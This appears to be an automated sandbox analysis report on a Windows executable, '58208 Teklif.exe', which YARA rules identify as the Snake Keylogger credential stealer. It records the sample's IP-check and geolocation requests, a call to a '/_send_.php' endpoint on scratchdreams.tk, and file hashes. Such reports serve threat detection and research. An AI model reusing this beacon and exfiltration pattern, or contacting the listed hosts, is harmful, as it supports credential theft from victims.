Apr 8, 2024 13:01:48.682076931 CEST | 1.1.1.1 | 192.168.2.11 | 0x40f4 | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Apr 8, 2024 13:01:48.682076931 CEST | 1.1.1.1 | 192.168.2.11 | 0x40f4 | No error (0) | checkip.dyndns.com |  | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Apr 8, 2024 13:01:48.682076931 CEST | 1.1.1.1 | 192.168.2.11 | 0x40f4 | No error (0) | checkip.dyndns.com |  | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Apr 8, 2024 13:01:48.682076931 CEST | 1.1.1.1 | 192.168.2.11 | 0x40f4 | No error (0) | checkip.dyndns.com |  | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Apr 8, 2024 13:01:48.682076931 CEST | 1.1.1.1 | 192.168.2.11 | 0x40f4 | No error (0) | checkip.dyndns.com |  | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Apr 8, 2024 13:01:48.682076931 CEST | 1.1.1.1 | 192.168.2.11 | 0x40f4 | No error (0) | checkip.dyndns.com |  | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Apr 8, 2024 13:01:49.867841959 CEST | 1.1.1.1 | 192.168.2.11 | 0x95ee | No error (0) | reallyfreegeoip.org |  | 104.21.67.152 | A (IP address) | IN (0x0001) | false
Apr 8, 2024 13:01:49.867841959 CEST | 1.1.1.1 | 192.168.2.11 | 0x95ee | No error (0) | reallyfreegeoip.org |  | 172.67.177.134 | A (IP address) | IN (0x0001) | false
Apr 8, 2024 13:01:56.853611946 CEST | 1.1.1.1 | 192.168.2.11 | 0xebfa | No error (0) | scratchdreams.tk |  | 172.67.169.18 | A (IP address) | IN (0x0001) | false
Apr 8, 2024 13:01:56.853611946 CEST | 1.1.1.1 | 192.168.2.11 | 0xebfa | No error (0) | scratchdreams.tk |  | 104.21.27.85 | A (IP address) | IN (0x0001) | false
                                                    • reallyfreegeoip.org
                                                    • scratchdreams.tk
                                                    • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49709 | 193.122.130.0 | 80 | 7580 | C:\Users\user\Desktop\58208 Teklif.exe
Timestamp | Bytes transferred | Direction | Data
Apr 8, 2024 13:01:48.845681906 CEST | 151 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
Apr 8, 2024 13:01:49.539989948 CEST | 276 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:49 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 107
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
Apr 8, 2024 13:01:49.548007965 CEST | 127 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
Apr 8, 2024 13:01:49.702605963 CEST | 276 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:49 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 107
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
Apr 8, 2024 13:01:50.446862936 CEST | 127 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
Apr 8, 2024 13:01:50.601237059 CEST | 276 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:50 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 107
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 49713 | 193.122.130.0 | 80 | 7580 | C:\Users\user\Desktop\58208 Teklif.exe
Timestamp | Bytes transferred | Direction | Data
Apr 8, 2024 13:01:51.320504904 CEST | 127 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
Apr 8, 2024 13:01:51.475860119 CEST | 276 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:51 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 107
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.11 | 49715 | 193.122.130.0 | 80 | 7580 | C:\Users\user\Desktop\58208 Teklif.exe
Timestamp | Bytes transferred | Direction | Data
Apr 8, 2024 13:01:52.211030960 CEST | 151 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
Apr 8, 2024 13:01:52.366915941 CEST | 276 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:52 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 107
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.11 | 49719 | 193.122.130.0 | 80 | 7580 | C:\Users\user\Desktop\58208 Teklif.exe
Timestamp | Bytes transferred | Direction | Data
Apr 8, 2024 13:01:53.086651087 CEST | 151 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
Apr 8, 2024 13:01:53.241333008 CEST | 276 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:53 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 107
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.11 | 49721 | 193.122.130.0 | 80 | 7580 | C:\Users\user\Desktop\58208 Teklif.exe
Timestamp | Bytes transferred | Direction | Data
Apr 8, 2024 13:01:53.963572979 CEST | 151 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
Apr 8, 2024 13:01:54.119596004 CEST | 276 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:54 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 107
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.11 | 49723 | 193.122.130.0 | 80 | 7580 | C:\Users\user\Desktop\58208 Teklif.exe
Timestamp | Bytes transferred | Direction | Data
Apr 8, 2024 13:01:54.855967999 CEST | 151 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
Apr 8, 2024 13:01:55.037714958 CEST | 276 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:54 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 107
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.11 | 49725 | 193.122.130.0 | 80 | 7580 | C:\Users\user\Desktop\58208 Teklif.exe
Timestamp | Bytes transferred | Direction | Data
Apr 8, 2024 13:01:55.758650064 CEST | 151 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
Apr 8, 2024 13:01:55.912643909 CEST | 276 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:55 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 107
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49711 | 104.21.67.152 | 443 | 7580 | C:\Users\user\Desktop\58208 Teklif.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-08 11:01:50 UTC | 88 | OUT | GET /xml/102.129.152.231 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
2024-04-08 11:01:50 UTC | 708 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:50 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 76011
                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mWTS1oyLF6iV945BZPo52O1mzWfGIrAuN%2Fz%2BZWNTEF7cCd8PY%2B0pLvBvwneAVnDdW%2BLKbQLSOl56gBEDPsIe1Gqqel1uVUpnuqU4t5Z0TP779m6J6HHFGLoLW0vai9gSk6PfpREN"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8711c2fdc92a3370-MIA
                                                    alt-svc: h3=":443"; ma=86400
2024-04-08 11:01:50 UTC | 380 | IN | Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 11:01:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 49712 | 104.21.67.152 | 443 | 7580 | C:\Users\user\Desktop\58208 Teklif.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-08 11:01:50 UTC | 64 | OUT | GET /xml/102.129.152.231 HTTP/1.1
                                                    Host: reallyfreegeoip.org
2024-04-08 11:01:51 UTC | 704 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:51 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 76012
                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o6reQkPXTG1pMgzPnbGB4t6yY1WU8tsyRKVg2nsh7HXZylR0dMyIH3v3tcdlkhiPh6kbdjohDZHpBewb7gD5x940DDGF4V1KPE1ezmkNu1m0AGdeCPY1LFR3p%2BwhUOKE8Nq2%2B4kD"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8711c3024b04748d-MIA
                                                    alt-svc: h3=":443"; ma=86400
2024-04-08 11:01:51 UTC | 380 | IN | Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 11:01:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.11 | 49714 | 104.21.67.152 | 443 | 7580 | C:\Users\user\Desktop\58208 Teklif.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-08 11:01:51 UTC | 88 | OUT | GET /xml/102.129.152.231 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
2024-04-08 11:01:52 UTC | 706 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:51 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 76012
                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fvz7BnSXtvkFB%2FaPrH078MMRCEg0hzoz98V%2FIQ93rrrc6LQD7enIBwCI5jfFiC6DU%2Bgwnr2W6raQPOBuFI7NYg5oX7Lm5bsVEmaa7hZ3Rad2ruetmBJzYR3r3K0KJAEoS1mTlAX5"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8711c307ceba7442-MIA
                                                    alt-svc: h3=":443"; ma=86400
2024-04-08 11:01:52 UTC | 380 | IN | Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 11:01:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.11 | 49717 | 104.21.67.152 | 443 | 7580 | C:\Users\user\Desktop\58208 Teklif.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-08 11:01:52 UTC | 88 | OUT | GET /xml/102.129.152.231 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
2024-04-08 11:01:52 UTC | 706 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:52 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 76013
                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KZQsEPa8qD6fGV2vdaj83RRC6UYwpcLsaZAHYCqlaBEeNqHa07Y6yG0FMrgSfc64%2F0GUJh6oVn2QurG%2F1RzjG4spH6TIXBvdltceaDbmZs2kX53AH6uqN%2FOcmFnol5vHToct5rkn"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8711c30d5fa8747d-MIA
                                                    alt-svc: h3=":443"; ma=86400
2024-04-08 11:01:52 UTC | 380 | IN | Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 11:01:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    4 | 192.168.2.11 | 49720 | 104.21.67.152 | 443 | 7580 | C:\Users\user\Desktop\58208 Teklif.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-04-08 11:01:53 UTC | 64 | OUT | GET /xml/102.129.152.231 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-04-08 11:01:53 UTC | 710 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:53 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 76014
                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h4y8GrZ3oUJTBy2brsfuSe96zpMCxl4kt8hFGPD8iFAvMLtW9kM4kdn81LeVrY%2BrI1ANB%2FOrSihHle1uQykWx6l72sT9ckE7I406zYAueuVvGwlO%2BYq%2BNMpIfWVw1UiklZt%2BuiMC"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8711c312ce305c77-MIA
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-08 11:01:53 UTC | 380 | IN | Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                    2024-04-08 11:01:53 UTC | 5 | IN | Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    5 | 192.168.2.11 | 49722 | 104.21.67.152 | 443 | 7580 | C:\Users\user\Desktop\58208 Teklif.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-04-08 11:01:54 UTC | 88 | OUT | GET /xml/102.129.152.231 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-04-08 11:01:54 UTC | 714 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:54 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 76015
                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W3oY4nADz7OrT9WilV8E%2Bg%2FQs1a9987dQ3DnbO9ItdUBWIkJ6svEjerjyJAYJAFOuafpvE2EhqSKFvBwaXDm2uipgg%2Fx4xND2%2FDOg9Yl0MxaNh7nAnb9bkA%2BCXTMRBIMqe%2F%2FHY5s"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8711c3184fc131e0-MIA
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-08 11:01:54 UTC | 380 | IN | Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                    2024-04-08 11:01:54 UTC | 5 | IN | Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    6 | 192.168.2.11 | 49724 | 104.21.67.152 | 443 | 7580 | C:\Users\user\Desktop\58208 Teklif.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-04-08 11:01:55 UTC | 64 | OUT | GET /xml/102.129.152.231 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-04-08 11:01:55 UTC | 712 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:55 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 76016
                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E4atZ%2F5UPTcfpdB%2Bk6%2FA56KcYcRV5BG4F2f6yQcW%2BQQl6Ao6fBUAiRBgO806P7T%2FrAe%2FUNFqPxZIvEJhR0JTNRy6p0LySgAnsDM94RyecAIf3QvTZsfQzI70LgMccb02mtmw3WAN"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8711c31e09a30321-MIA
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-08 11:01:55 UTC | 380 | IN | Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                    2024-04-08 11:01:55 UTC | 5 | IN | Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    7 | 192.168.2.11 | 49726 | 104.21.67.152 | 443 | 7580 | C:\Users\user\Desktop\58208 Teklif.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-04-08 11:01:56 UTC | 88 | OUT | GET /xml/102.129.152.231 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-04-08 11:01:56 UTC | 712 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:56 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 76017
                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1VlKXsG%2FkCuYU%2B%2B2X61xrVRMYPPyTDqA4eInFI06J7YYelh30CKEK4dJW0rXTOFLEtD2CIfPSY%2BePAaYcPD977Fw0adthJMMreGKfcQIT3d6Kg%2BiqfmVMcVLdND5%2BnU8x1CTM0dh"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8711c3237d6da587-MIA
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-08 11:01:56 UTC | 380 | IN | Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                    2024-04-08 11:01:56 UTC | 5 | IN | Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    8 | 192.168.2.11 | 49727 | 172.67.169.18 | 443 | 7580 | C:\Users\user\Desktop\58208 Teklif.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-04-08 11:01:57 UTC | 79 | OUT | GET /_send_.php?TS HTTP/1.1
                                                    Host: scratchdreams.tk
                                                    Connection: Keep-Alive
                                                    2024-04-08 11:02:28 UTC | 731 | IN | HTTP/1.1 522
                                                    Date: Mon, 08 Apr 2024 11:02:28 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 15
                                                    Connection: close
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6FP9JKsmyUIR2EQOWghuySeRFGCerggC%2FSerbHv7uSfBjSbBuqg2zNP6n7cL14kKG3umGkK3F5g3Vh4KvCnOnI26LiaqLR9P4mqFLbJLjHOhPz6iBHjI10FyJ8iju8rhckqm"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    X-Frame-Options: SAMEORIGIN
                                                    Referrer-Policy: same-origin
                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    Server: cloudflare
                                                    CF-RAY: 8711c32968b07429-MIA
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-08 11:02:28 UTC | 15 | IN | Data Ascii: error code: 522


                                                    Target ID:0
                                                    Start time:13:01:46
                                                    Start date:08/04/2024
                                                    Path:C:\Users\user\Desktop\58208 Teklif.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\58208 Teklif.exe"
                                                    Imagebase:0xd40000
                                                    File size:846'344 bytes
                                                    MD5 hash:DC59E080BC0BE8CEE52EC9E79CCC7E82
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:13:01:47
                                                    Start date:08/04/2024
                                                    Path:C:\Users\user\Desktop\58208 Teklif.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\58208 Teklif.exe"
                                                    Imagebase:0xb40000
                                                    File size:846'344 bytes
                                                    MD5 hash:DC59E080BC0BE8CEE52EC9E79CCC7E82
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3769706051.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:false

                                                      Execution Graph

                                                      Execution Coverage:9.8%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:225
                                                      Total number of Limit Nodes:11
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8488df357147a6ae90d1e0a3a2957eea2ba4476ddd5b849831be642b5990e87b
                                                      • Instruction ID: 5cc44738978a551974ebfb0b563801765e2e3d5802c7f45c988b2440f1ffbaf5
                                                      • Opcode Fuzzy Hash: 8488df357147a6ae90d1e0a3a2957eea2ba4476ddd5b849831be642b5990e87b
                                                      • Instruction Fuzzy Hash: 7E314FB1D153498FDB09CF6AD8142DEBFF6AF8A310F04C0AAD408AB265DB741949CB61
                                                      Uniqueness

